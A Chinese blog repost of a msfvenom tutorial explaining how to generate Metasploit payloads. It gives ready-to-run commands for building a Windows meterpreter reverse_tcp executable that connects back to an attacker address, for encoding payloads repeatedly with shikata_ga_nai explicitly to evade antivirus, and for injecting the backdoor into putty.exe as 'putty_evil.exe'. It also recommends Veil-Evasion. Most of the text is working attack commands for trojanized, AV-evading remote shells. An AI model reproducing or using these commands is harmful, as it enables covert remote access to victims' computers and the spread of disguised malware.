---
title: 转载:msfvenom工具
date: 2019-04-01 15:43:20
tags: kail
---
趁还没被[CSDN](http://link.zhihu.com/?target=http%3A//blog.csdn.net/lzhd24/article/details/50664342)和谐掉,立马转了过来。

<!-- more -->
## 一,msfvenom生成payload的常见格式为：

### 最简单型：

```
msfvenom -p <payload> <payload options> -f <format> -o <path>
```
#### 编码处理型：
```
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>
```
#### 注入exe型+编码：

```
msfvenom -p <payload> <payload options> -a <arch> --plateform <platform> -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path>
```
#### 拼接型：

```
msfvenom -c <shellcode> -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -f <format> -o <path>
```
-o输出参数可以用“>”号代替 
-f指定格式参数可以用单个大写字母代替： 
例如：X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/Linux/osx/Android和不同的编程语言Python/PHP等。

```
msfvenom -l payloads
```
再来看一下编码方法其中,excellent级别的共有两个：
```
1.x86/shikata_ga_nai 　　　　　＃闻名不如见面
2.cmd/powershell_base64   　　＃见面胜似闻名msfvenom -l encoders
```
再看一下nops选项（空字段模块／一切为了绕过和免杀）：

```
msfvenom -l nops
```
最后看一下支持的平台和可以生成的格式：

```
msfvenom --help-platforms
msfvenom --help-formats
```

## 二,以反弹回meterpreter会话的payload为例：

```
window/meterpreter/reverse_tcp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o payload.exe
```
我们来看一下options

```
root@localhost:~# msfvenom -p windows/meterpreter/reverse_tcp --payload-options
Options for payload/windows/meterpreter/reverse_tcp:


       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 281
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    sf <stephen_fewer@harmonysecurity.com>
    OJ Reeves
    hdm <x@hdm.io>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective Dll Injection 
  payload (staged). Connect back to the attacker

```
### 这里我们需要注意的是两点：

#### １,系统架构： 
Arch:x86　 是指生成的payload只能在32位系统运行 
Arch:x86_64　是指模块同时兼容32位操作系统和64位操作系统 
Arch:x64 　是指生成的payload只能在64位系统运行 
注意：有的payload的选项为多个：Arch:x86_64,x64 
这里你就需要-a参数选择一个系统架构。 
#### ２,size(大小),rank(等级),exitfunc(退出方法)

将payload注入到putty中,并编码：

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/下载/putty.exe -k -f exe -o /root/桌面/putty_evil.exe
```
最后,再介绍一个payload生成器Veil-Evasion 

```
https://github.com/Veil-Framework/Veil-Evasion　＃免杀效果较好
```

